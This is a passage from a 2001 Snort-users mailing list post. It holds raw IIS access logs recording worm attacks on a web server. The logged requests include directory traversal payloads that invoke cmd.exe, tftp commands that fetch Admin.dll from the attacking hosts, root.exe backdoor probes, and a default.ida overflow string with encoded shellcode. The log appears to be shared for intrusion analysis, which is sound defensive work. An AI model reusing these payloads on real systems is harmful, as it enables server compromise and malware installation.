/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:47:18 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:19 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:23 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:23 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:24 66.31.25.7 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:47:27 66.31.25.7 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:27 66.31.25.7 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:47:28 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:47:31 66.31.25.7 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:47:34 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:36 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:36 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:47:47 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:47:54 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:48:07 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:48:08 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:48:12 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:48:15 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.25.7%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:48:15 66.31.25.7 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:49:06 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:49:06 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:49:34 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:49:53 66.31.23.222 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:49:53 66.31.23.222 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:49:55 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:49:56 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:49:56 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:50:37 66.12.111.154 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:50:49 66.12.111.154 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:50:52 66.12.111.154 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:50:56 66.12.111.154 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:50:59 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:01 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:03 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:04 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:06 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:07 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:08 66.31.23.222 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:51:10 66.31.23.222 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:11 66.31.23.222 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:51:12 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:51:12 66.31.23.222 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:13 66.31.23.222 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:13 66.31.23.222 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:51:14 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:14 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:16 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:17 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:18 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:18 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:19 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:19 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:21 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:25 66.108.1.109 - 66.31.82.9 80 GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00
=a 302 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:51:33 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:51:42 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:50 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.23.222%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:51:50 66.31.42.216 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:51:50 66.31.23.222 - 66.31.82.9 80 GET
/scripts/..%2f../Admin.dll - 500 -
2001-09-18 13:51:56 66.31.42.216 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:52:03 66.31.42.216 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:09 66.31.42.216 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:16 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:21 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.42.216%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:27 66.31.42.216 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.42.216%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:38 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:39 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:39 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:48 66.31.135.215 - 66.31.82.9 80 GET
/scripts/..%2f../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.135.215%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:50 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:54 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:52:54 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:52:55 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:52:55 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_vti_bin/..%5c../..%5c../..%5c../Admin.dll - 500 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 403 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:52:56 66.31.94.77 - 66.31.82.9 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:06 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20d:\Admin.dll 502 -
2001-09-18 13:53:08 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20e:\Admin.dll 502 -
2001-09-18 13:53:08 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../Admin.dll - 500 -
2001-09-18 13:53:09 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:53:09 66.31.94.77 - 66.31.82.9 80 GET
/scripts/..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2066.31.94.77%20GET%20Admin.dll%20c:\Admin.dll 502 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET /scripts/root.exe
/c+dir 404 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET /MSADC/root.exe
/c+dir 403 -
2001-09-18 13:53:36 66.31.32.20 - 66.31.82.9 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20010918/b8e18cc7/attachment.html>
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: log.txt
URL: <https://lists.snort.org/pipermail/snort-users/attachments/20010918/b8e18cc7/attachment.txt>


More information about the Snort-users mailing list